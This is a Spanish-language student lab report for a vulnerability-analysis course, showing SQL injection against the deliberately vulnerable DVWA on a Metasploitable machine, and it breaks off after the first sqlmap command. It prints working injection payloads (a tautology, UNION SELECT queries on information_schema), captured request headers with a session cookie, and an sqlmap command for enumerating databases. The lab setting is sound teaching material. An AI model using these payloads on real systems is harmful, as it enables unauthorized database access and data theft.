SQL INJECTION DVWA
Enviado por Raul Zapata • 17 de Noviembre de 2020 • Informe • 383 Palabras (2 Páginas) • 453 Visitas
Asignatura | Datos del alumno | Fecha |
Análisis de vulnerabilidades | Apellidos: Zapata Aguinaga | 29/05/2020 |
Nombre: Raúl Gerardo |
Actividad: SQL Injection contra DVWA
Manual.
Verificar que los equipos Kali y Metasploitable se encuentran en la misma red.
[pic 1]
[pic 2]
En el navegador FireFox, colocamos la ip del equipo Metaspolitable y se ejecuta DVWA
[pic 3]
Se selecciona el nivel de seguridad y se coloca en low para la actividad
[pic 4]
Se ejecuta SQL Injection y en la caja de texto se coloca la comilla, la cual espera un cierre, si presenta un error de SQL, estaremos ante un desarrollo inseguro, adicionalmente se muestra la comilla en URL y muestra el error de sintaxis en el navegador
[pic 5]
[pic 6]
Si se ingresa el número 1 retorna el usuario al que le corresponde el identificador 1
[pic 7]
Cada usuario tiene un número identificador, con el comando a' OR ''=' tenemos todos los usuarios.
[pic 8]
Con el siguiente query, se obtiene de la tabla usuarios el nombre y la contraseña, utilizando union y concat
' union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name= ‘users’ #
[pic 9]
Se listan los nombres de las bases de datos
' union select null,schema_name from information_schema.schemata #
[pic 10]
SQLMAP
Se instala un analizador de cabeceras en FireFox, ya que es necesario obtener el User-Agent y las cookies de sesión para ejecutar el proceso con SqlMap. Se debe incluir el URL, en este caso el URL que retorna el botón Submit. La opción dbs lista las bases de datos
[pic 11]
Host: 192.168.100.231
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.231/dvwa/vulnerabilities/sqli/?id=%27+union+select+null%2Cschema_name+from+information_schema.schemata+%23&Submit=Submit
Connection: keep-alive
Cookie: security=low; PHPSESSID=6bedbfab32551dbc7d580374e74c621e
Upgrade-Insecure-Requests: 1
Con el siguiente comando se obtienen los nombres de las bases de datos
sqlmap --headers="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="security=low; PHPSESSID=6bedbfab32551dbc7d580374e74c621e" -u "http://192.168.100.231/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" –dbs
...